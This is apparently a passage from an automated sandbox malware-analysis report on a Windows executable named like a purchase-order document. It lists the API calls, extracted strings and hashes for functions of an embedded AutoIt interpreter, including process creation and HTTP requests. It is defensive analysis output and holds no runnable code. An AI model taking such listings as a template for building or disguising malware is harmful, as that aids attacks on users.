                                                                                    • _wcslen.LIBCMT ref: 001D8391
                                                                                    • _wcslen.LIBCMT ref: 001D83B4
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 001D83F2
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,001D5BF2), ref: 001D844E
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001D8487
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 001D84CA
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 001D8501
                                                                                    • FreeLibrary.KERNEL32(?), ref: 001D850D
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 001D851D
                                                                                    • DestroyIcon.USER32(?,?,?,?,?,001D5BF2), ref: 001D852C
                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 001D8549
                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 001D8555
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                    • String ID: .dll$.exe$.icl
                                                                                    • API String ID: 799131459-1154884017
                                                                                    • Opcode ID: f08f93fc3e1db0d7b9d6928fe5a64c83686e5c2997f0a47af324e95661c58a30
                                                                                    • Instruction ID: a858ec16edd9dd68c5a42c43e5d8864fd08d786f7d3768068ded747882375cf6
                                                                                    • Opcode Fuzzy Hash: f08f93fc3e1db0d7b9d6928fe5a64c83686e5c2997f0a47af324e95661c58a30
                                                                                    • Instruction Fuzzy Hash: 9761D071940216BBEB14DF64DC81BBF77A8FB18B11F10460AF915DA2D1DB74A990CBA0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                    • API String ID: 0-1645009161
                                                                                    • Opcode ID: d3dd82e881cd1c3cb8b42555c9aef2fa9738d5ed36541014e1bae147448c8980
                                                                                    • Instruction ID: 30d857d930ef8672c757438995aa2fa9c6d368e7f858e7ac3a2e5b4cc2ba5421
                                                                                    • Opcode Fuzzy Hash: d3dd82e881cd1c3cb8b42555c9aef2fa9738d5ed36541014e1bae147448c8980
                                                                                    • Instruction Fuzzy Hash: F2812B71A44205BBDB20BF60DC46FAF37A9EF25300F054025F905AB1E6EB71DA26CB91
                                                                                    APIs
                                                                                    • LoadIconW.USER32(00000063), ref: 001A5A2E
                                                                                    • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001A5A40
                                                                                    • SetWindowTextW.USER32(?,?), ref: 001A5A57
                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 001A5A6C
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 001A5A72
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001A5A82
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 001A5A88
                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001A5AA9
                                                                                    • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001A5AC3
                                                                                    • GetWindowRect.USER32(?,?), ref: 001A5ACC
                                                                                    • _wcslen.LIBCMT ref: 001A5B33
                                                                                    • SetWindowTextW.USER32(?,?), ref: 001A5B6F
                                                                                    • GetDesktopWindow.USER32 ref: 001A5B75
                                                                                    • GetWindowRect.USER32(00000000), ref: 001A5B7C
                                                                                    • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 001A5BD3
                                                                                    • GetClientRect.USER32(?,?), ref: 001A5BE0
                                                                                    • PostMessageW.USER32(?,00000005,00000000,?), ref: 001A5C05
                                                                                    • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001A5C2F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                    • String ID:
                                                                                    • API String ID: 895679908-0
                                                                                    • Opcode ID: f0df1450584d64e2a4f9e92005d250b6d09bcb090f8adf691e588628ebb489c5
                                                                                    • Instruction ID: de46000023134d12b05844a6bb561e597328f17b6d0850c58d8b645edd1f34c7
                                                                                    • Opcode Fuzzy Hash: f0df1450584d64e2a4f9e92005d250b6d09bcb090f8adf691e588628ebb489c5
                                                                                    • Instruction Fuzzy Hash: 0C718135905B05EFDB20DFA8CD85AAEBBF6FF48705F104919E142A35A0D774E944CB60
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen
                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[
                                                                                    • API String ID: 176396367-3679483830
                                                                                    • Opcode ID: 32d383bcbd9958ed5d078f9e9fd22b6eb3d2e86b252542d7f13d5dde0dbf07e7
                                                                                    • Instruction ID: 327637a4215d92fa7b6c8b1ea2cbd0bbeff46afa2e9dd221637401f4966c227e
                                                                                    • Opcode Fuzzy Hash: 32d383bcbd9958ed5d078f9e9fd22b6eb3d2e86b252542d7f13d5dde0dbf07e7
                                                                                    • Instruction Fuzzy Hash: 5DE1F736A006269BCB18DF78C8517EEFBB0BF16714F55811AF466E7240DB30AE85C790
                                                                                    APIs
                                                                                    • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 001600C6
                                                                                      • Part of subcall function 001600ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0021070C,00000FA0,735D41DC,?,?,?,?,001823B3,000000FF), ref: 0016011C
                                                                                      • Part of subcall function 001600ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,001823B3,000000FF), ref: 00160127
                                                                                      • Part of subcall function 001600ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,001823B3,000000FF), ref: 00160138
                                                                                      • Part of subcall function 001600ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0016014E
                                                                                      • Part of subcall function 001600ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0016015C
                                                                                      • Part of subcall function 001600ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0016016A
                                                                                      • Part of subcall function 001600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00160195
                                                                                      • Part of subcall function 001600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 001601A0
                                                                                    • ___scrt_fastfail.LIBCMT ref: 001600E7
                                                                                      • Part of subcall function 001600A3: __onexit.LIBCMT ref: 001600A9
                                                                                    Strings
                                                                                    • kernel32.dll, xrefs: 00160133
                                                                                    • WakeAllConditionVariable, xrefs: 00160162
                                                                                    • InitializeConditionVariable, xrefs: 00160148
                                                                                    • SleepConditionVariableCS, xrefs: 00160154
                                                                                    • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00160122
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                    • API String ID: 66158676-1714406822
                                                                                    • Opcode ID: 2a9b3643a1705994e77e1d7de1fe7cdd23eb6782a8d0cc54157550bf91359f43
                                                                                    • Instruction ID: cbcb60a25bef8deb9bb7b75d2abe73185336758b33e3f9efdad3e4200d7c6d19
                                                                                    • Opcode Fuzzy Hash: 2a9b3643a1705994e77e1d7de1fe7cdd23eb6782a8d0cc54157550bf91359f43
                                                                                    • Instruction Fuzzy Hash: 15212932642711ABD7126BA4AC4AB6B73D5EB1EB51F10052BFC02D67D1DFB09C81CA90
                                                                                    APIs
                                                                                    • CharLowerBuffW.USER32(00000000,00000000,001DCC08), ref: 001B4527
                                                                                    • _wcslen.LIBCMT ref: 001B453B
                                                                                    • _wcslen.LIBCMT ref: 001B4599
                                                                                    • _wcslen.LIBCMT ref: 001B45F4
                                                                                    • _wcslen.LIBCMT ref: 001B463F
                                                                                    • _wcslen.LIBCMT ref: 001B46A7
                                                                                      • Part of subcall function 0015F9F2: _wcslen.LIBCMT ref: 0015F9FD
                                                                                    • GetDriveTypeW.KERNEL32(?,00206BF0,00000061), ref: 001B4743
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                    • API String ID: 2055661098-1000479233
                                                                                    • Opcode ID: 14deca195b8d3cf7832cf13359ad8c7cd11db80db252521f7da1b618c72f1e49
                                                                                    • Instruction ID: 1a9f9f85fb66672a8ad508265bd9432e0dbee7c5e48823c4ec52127ff3121878
                                                                                    • Opcode Fuzzy Hash: 14deca195b8d3cf7832cf13359ad8c7cd11db80db252521f7da1b618c72f1e49
                                                                                    • Instruction Fuzzy Hash: 5DB1F5716083129FC724DF28C890ABEB7E5BFA9764F50891DF496C7292DB30D845CB92
                                                                                    APIs
                                                                                      • Part of subcall function 00159BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00159BB2
                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 001D9147
                                                                                      • Part of subcall function 001D7674: ClientToScreen.USER32(?,?), ref: 001D769A
                                                                                      • Part of subcall function 001D7674: GetWindowRect.USER32(?,?), ref: 001D7710
                                                                                      • Part of subcall function 001D7674: PtInRect.USER32(?,?,001D8B89), ref: 001D7720
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 001D91B0
                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 001D91BB
                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 001D91DE
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 001D9225
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 001D923E
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 001D9255
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 001D9277
                                                                                    • DragFinish.SHELL32(?), ref: 001D927E
                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 001D9371
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#!
                                                                                    • API String ID: 221274066-1008745475
                                                                                    • Opcode ID: fd2f0288e0a539af16e21c223bbec16a4382a59700e573e6dc8dbac27ceae4db
                                                                                    • Instruction ID: 6da27d9835edb9261ba6dda3ab6c1bc74119e8cfba8fadb0c683ca8f09b78ebc
                                                                                    • Opcode Fuzzy Hash: fd2f0288e0a539af16e21c223bbec16a4382a59700e573e6dc8dbac27ceae4db
                                                                                    • Instruction Fuzzy Hash: 88618B71109301AFD701DF64DC89DAFBBE8EF99350F000A1EF595932A1DB309A49CB92
                                                                                    APIs
                                                                                    • _wcslen.LIBCMT ref: 001CB198
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001CB1B0
                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 001CB1D4
                                                                                    • _wcslen.LIBCMT ref: 001CB200
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001CB214
                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 001CB236
                                                                                    • _wcslen.LIBCMT ref: 001CB332
                                                                                      • Part of subcall function 001B05A7: GetStdHandle.KERNEL32(000000F6), ref: 001B05C6
                                                                                    • _wcslen.LIBCMT ref: 001CB34B
                                                                                    • _wcslen.LIBCMT ref: 001CB366
                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 001CB3B6
                                                                                    • GetLastError.KERNEL32(00000000), ref: 001CB407
                                                                                    • CloseHandle.KERNEL32(?), ref: 001CB439
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001CB44A
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001CB45C
                                                                                    • CloseHandle.KERNEL32(00000000), ref: 001CB46E
                                                                                    • CloseHandle.KERNEL32(?), ref: 001CB4E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2178637699-0
                                                                                    • Opcode ID: 543c4c5c91ae350ce758f28f80b994e2ac596f482b5fde5ddbaea69c59528ad4
                                                                                    • Instruction ID: c45250d5be4f05b8bb22d0bc195ca18d51145d7a9950b1d6026a047552e87b21
                                                                                    • Opcode Fuzzy Hash: 543c4c5c91ae350ce758f28f80b994e2ac596f482b5fde5ddbaea69c59528ad4
                                                                                    • Instruction Fuzzy Hash: 50F17B315083409FD714EF24C892B6EBBE5BFA5314F14895DF8999B2A2CB31EC45CB92
                                                                                    APIs
                                                                                    • GetMenuItemCount.USER32(00211990), ref: 00182F8D
                                                                                    • GetMenuItemCount.USER32(00211990), ref: 0018303D
                                                                                    • GetCursorPos.USER32(?), ref: 00183081
                                                                                    • SetForegroundWindow.USER32(00000000), ref: 0018308A
                                                                                    • TrackPopupMenuEx.USER32(00211990,00000000,?,00000000,00000000,00000000), ref: 0018309D
                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 001830A9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                    • String ID: 0
                                                                                    • API String ID: 36266755-4108050209
                                                                                    • Opcode ID: 19fe32cbb218a5e7cd7739efecbaf07e79d973c1a65ef0e4978842710784cb66
                                                                                    • Instruction ID: 9cc4581a028c204addc0e70f13d90bf1e6006de79551446c802528c9d4f46c2f
                                                                                    • Opcode Fuzzy Hash: 19fe32cbb218a5e7cd7739efecbaf07e79d973c1a65ef0e4978842710784cb66
                                                                                    • Instruction Fuzzy Hash: AB715D30645206BFEB259F64DC89F9ABF64FF05324F204206F624661E0C7B1AE50DF90
                                                                                    APIs
                                                                                    • DestroyWindow.USER32(?,?), ref: 001D6DEB
                                                                                      • Part of subcall function 00146B57: _wcslen.LIBCMT ref: 00146B6A
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 001D6E5F
                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001D6E81
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001D6E94
                                                                                    • DestroyWindow.USER32(?), ref: 001D6EB5
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00140000,00000000), ref: 001D6EE4
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001D6EFD
                                                                                    • GetDesktopWindow.USER32 ref: 001D6F16
                                                                                    • GetWindowRect.USER32(00000000), ref: 001D6F1D
                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 001D6F35
                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 001D6F4D
                                                                                      • Part of subcall function 00159944: GetWindowLongW.USER32(?,000000EB), ref: 00159952
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                    • String ID: 0$tooltips_class32
                                                                                    • API String ID: 2429346358-3619404913
                                                                                    • Opcode ID: 7cf86ff6afdcad93a310a1d14f5f9b4f64709c5c688d0721b6a211624fd3b317
                                                                                    • Instruction ID: c4056e2e89083219cd6e0184e321d4d41d12258bba41c7a706dab22b85c6f4b1
                                                                                    • Opcode Fuzzy Hash: 7cf86ff6afdcad93a310a1d14f5f9b4f64709c5c688d0721b6a211624fd3b317
                                                                                    • Instruction Fuzzy Hash: 68716674104245AFDB21CF18DC58EAABBF9FB99304F04491EF99987361CB70E946CB52
                                                                                    APIs
                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001BC4B0
                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001BC4C3
                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001BC4D7
                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 001BC4F0
                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 001BC533
                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 001BC549
                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001BC554
                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 001BC584
                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 001BC5DC
                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 001BC5F0
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 001BC5FB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159406344.0000000000214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_140000_PO-DOC1522025-12.jbxd
                                                                                    Similarity
                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                    • String ID:
                                                                                    • API String ID: 3800310941-3916222277
                                                                                    • Opcode ID: d351975b83d6fdc127ac14acda7ac9da6f8a4ec101694e6de40420fbf48e2cfe
                                                                                    • Instruction ID: 0b19835dacb7654b6126d76cfa7bb287fb2686729b2a35ab70817f83faaf63fa
                                                                                    • Opcode Fuzzy Hash: d351975b83d6fdc127ac14acda7ac9da6f8a4ec101694e6de40420fbf48e2cfe
                                                                                    • Instruction Fuzzy Hash: 33513BB1601609BFDB219FA5C988AEB7BBCFF08754F00441AF945D6650DB34EA44DBE0
                                                                                    APIs
                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 001D8592
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001D85A2
                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001D85AD
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001D85BA
                                                                                    • GlobalLock.KERNEL32(00000000), ref: 001D85C8
                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001D85D7
                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 001D85E0
                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001D85E7
                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 001D85F8
                                                                                    • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,001DFC38,?), ref: 001D8611
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 001D8621
                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 001D8641
                                                                                    • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 001D8671
                                                                                    • DeleteObject.GDI32(?), ref: 001D8699
                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 001D86AF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2159245781.0000000000141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2159216006.0000000000140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.00000000001DC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159322634.0000000000202000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2159382628.000000000020C000.00000004.00000001.01000000.00000003.sdmpDownload File
